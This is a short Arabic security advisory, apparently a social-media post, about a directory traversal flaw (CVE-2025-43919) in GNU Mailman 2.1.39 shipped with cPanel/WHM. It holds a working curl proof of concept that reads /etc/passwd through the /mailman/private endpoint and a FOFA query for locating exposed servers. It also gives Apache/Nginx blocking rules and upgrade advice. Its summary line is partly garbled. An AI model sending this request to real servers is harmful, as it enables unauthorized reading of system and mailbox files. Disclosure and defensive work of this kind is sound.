
تم اكتشاف ثغرة أمنية جديدة في GNU Mailman 2.1.39، المضمنة مع cPanel/WHM، مما يسمح للمهاجمين عن بُعد غير الموثّقين بقراءة ملفات عشوائية على الخادم عبر عيب اجتياز الدليل.
تم اكتشاف ثغرة جديدة في GNU Mailman 2.1.39 المضمن مع cPanel/WHM، مما يسمح للمهاجمين عن بُعد غير المصادق عليهم بقراءة ملفات عشوائية على الخادم عبر خلل في اجتياز الدليل.
📌 ملخص الثغرة:
اجتياز الدليل (بدون مصادقة)private.py/mailman/private/mailman/etc/passwd، وأرشيفات .mbox، وإعدادات Mailman5.8 (متوسطة)CVE-2025-43919الحالة: لا يوجد تصحيح رسمي (Mailman 2.1.x هو إصدار منتهي الصلاحية)
🔥 إثبات المفهوم:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 سيناريوهات الاستغلال:
/etc/passwd، أو configs، أو ملفات صندوق البريد🛡️ التخفيف:
منع الوصول إلى /mailman/private على مستوى خادم الويب:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
أو في Nginx:
location /mailman/private {
deny all;
return 403;
}
⬆️ الانتقال إلى Mailman 3.x — 2.x هو إصدار منتهي الصلاحية ويفتقر إلى الحماية الحديثة
🔍 استعلام FOFA : app="Mailman"
📚 تعرف على المزيد، شارك بمسؤولية، وحافظ على أمان بنيتك التحتية.
🔒 تابع لمعرفة المزيد من ثغرات CVE الواقعية، وإثباتات المفهوم، ونصائح التقوية: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity